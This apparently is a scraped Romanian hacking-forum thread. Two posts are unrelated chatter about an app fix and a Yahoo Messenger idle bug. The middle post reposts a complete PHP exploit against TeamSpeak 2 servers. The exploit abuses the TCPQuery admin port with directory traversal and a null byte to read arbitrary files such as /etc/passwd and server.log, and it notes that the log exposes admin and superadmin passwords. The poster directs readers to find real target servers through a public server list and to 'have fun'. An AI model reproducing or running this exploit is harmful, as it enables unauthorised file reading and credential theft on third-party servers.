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  1. 1. Trebuie facut encode in sursa la url de la img ca sa se salveze aplicatia. 2. Doar tu, ca develeper al aplicatiei poti sa o vezi pe profilul tau, altii nu o pot vedea. => FIXED !
  2. <?php // teamspeak server <= remote read file vulnerability // bug found and exploit write by c411k // [url]http://www.heise-online.co.uk/security/Vulnerability-in-TeamSpeak-2-server--/news/93734[/url] zazhali ploent svolo4i!! // tested on win ts2_server_rc2_202317, ts2_server_rc2_20201.exe // grats all [url]https://forum.antichat.ru[/url] // use [url]http://localhost/ts_xek.php[/url] // 10.01.09 error_reporting(0); @ini_set("max_execution_time",0); @ini_set('output_buffering',0); @set_magic_quotes_runtime(0); @set_time_limit(0); @ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n"); header("Pragma: no-cache"); function check_ver($site, $xek, $port) { $url = fsockopen("$site", "$port", $errno, $errstr, 22); $send_pac = "$xek\r\n\r\n"; fputs($url, $send_pac); $s = ''; while (!feof($url) and strpos(implode($s), 'OK') === false) { $s[] = fgets($url, 1028); } fclose($url); return implode($s); } function html() { if (isset($_POST['file'])) $file = $_POST['file']; else $file = '../../../../../etc/passwd'; echo '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post"> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="parampampam" type="submit" value=" ?read file...?"> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="check_ver" type="submit" value=" ?check_version?"><br> <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD"> ?¬ teamspeak hostname or ip, for expamle "ts.antichat.ru" <input style="background-color: #31333B; color: #B9B9BD;" name="port" value="51234"><font color="#B9B9BD"> ?¬ port to TCQquery admin, default 51234 <input style="background-color: #31333B; color: #B9B9BD;" name="file" value="'.$file.'"><font color="#B9B9BD">?¬ file to read.'; } function info() { echo '<br> for example: server.log server.dbs ../../../../../boot.ini ../../../../../etc/passwd ../../../../../usr/local/apache/conf/httpd.conf etc. brain on admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files. <textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>--------------------------------------------------------------- -------------- log started at 10-01-09 00:24 ------------- --------------------------------------------------------------- 10-01-09 00:24:28,ALL,Info,server, Server init initialized 10-01-09 00:24:28,ALL,Info,server, Server version: Win32 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_servers 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_server_privileges 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_channels 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_channel_privileges 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_clients 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_bans 10-01-09 00:24:28,ALL,Info,server, Starting VirtualServer id:1 with port:8767 10-01-09 00:24:28,WARNING,Info,SERVER, Default VirtualServer created 10-01-09 00:24:28,WARNING,Info,SERVER, admin account info: username: admin password: kcqy8y 10-01-09 00:24:28,WARNING,Info,SERVER, superadmin account info: username: superadmin password: e7em45 10-01-09 00:24:29,ALL,Info,server, Server init finished</textarea></form>'; } function head() { echo '<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>xek_teamspeak_2.0.19.50</title> <style> <!-- A:link {COLOR: #B9B9BD; TEXT-DECORATION: none} A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none} A:active {COLOR: #228B22; TEXT-DECORATION: none} A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline} BODY { margin="5"; FONT-WEIGHT: normal; COLOR: #B9B9BD; BACKGROUND: #44474F; FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; } --> </style> </head> <body>'; } head(); if (!$_GET) { html(); info(); } if (isset($_GET['go_fuck'])) { $hostname = $_POST['hostname']; $file = $_POST['file']; $port = $_POST['port']; if (isset($_POST['check_ver'])) { echo '<pre>'.check_ver($hostname, 'ver', $port); } if (isset($_POST['parampampam'])) { echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>'; html(); } } ?> Use: http://localhost/ts_xek.php Servere gasiti pe: http://www.tsviewer.com E vechi.. dar daca nu aveti ce face e tocmai bun Have fun ____________________________ Source: https://forum.antichat.ru
  3. sunt curios unde ai vazut`o asta cu idle 31 days nu se poate imita, este un bug la yahoo messenger. Daca ai fake idle si cineva iti da add iar tu ii dai accept si apari in lista lui, el te va vedea cu idle de ordinul zilelor.
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